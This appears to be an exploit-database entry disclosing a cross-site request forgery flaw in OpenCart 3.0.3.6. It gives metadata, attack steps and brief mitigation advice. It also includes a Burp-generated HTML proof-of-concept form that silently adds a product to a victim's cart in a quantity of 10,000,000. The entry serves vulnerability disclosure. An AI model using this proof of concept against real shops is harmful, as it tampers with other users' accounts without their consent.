header-logo
Suggest Exploit
vendor:
OpenCart CMS
by:
Mahendra Purbia {Mah3Sec}
8.8
CVSS
HIGH
Cross Site Request Forgery
352
CWE
Product Name: OpenCart CMS
Affected Version From: 3.0.3.6
Affected Version To: 3.0.3.6
Patch Exists: NO
Related CWE: N/A
CPE: a:opencart:opencart:3.0.3.6
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2020

OpenCart 3.0.3.6 – Cross Site Request Forgery

This product have the functionality which let user to add the wish-list of other user in to his/her cart. So, user A can add products to his/her wish-list and can make his/her wish-list public which let other users to see the wish-list. Attack Vector: 1. create two accounts A(attacker) & B(victim) 2. login with A and add a product in cart and capture that particular request in burpsuite. 3. Now change the quantity if want and then create a csrf poc of that request. 4. Save it as .html and send it to victim. Now the product added to victims cart.

Mitigation:

Implementing a CSRF token in the application, validating the referrer header, and using a CAPTCHA are some of the ways to mitigate CSRF attacks.
Source

Exploit-DB raw data:

# Exploit Title: OpenCart 3.0.3.6 - Cross Site Request Forgery
# Date: 12-11-2020
# Exploit Author: Mahendra Purbia {Mah3Sec}
# Vendor Homepage: https://www.opencart.com
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: OpenCart CMS - 3.0.3.6 
# Tested on: Kali Linux

#Description: 
This product have the functionality which let user to add the wish-list of other user in to his/her cart. So, user A can add products to his/her wish-list and can make his/her wish-list public which let other users to see the wish-list. Now, as user B there is a button of add to cart , when you click on it that public wish-list will be added in to your cart.

#Additional Information:
well i found this vulnerability in Opencart based websites but they not respond so i installed a lest version of Opencart CMS and hosted on localhost with help of XAMP and then i exploited that vulnerability.
Attack Vector:
1. create two accounts A(attacker) & B(victim)
2. login with A and add a product in cart and capture that particular request in burpsuite.
3. Now change the quantity if want and then create a csrf poc of that request.
4. Save it as .html and send it to victim. Now the product added to victims cart.

#POC: 
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/shop/index.php?route=checkout/cart/add" method="POST">
      <input type="hidden" name="product&#95;id" value="43" />
      <input type="hidden" name="quantity" value="10000000" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Navigation

Suggest Exploit

Services By CQR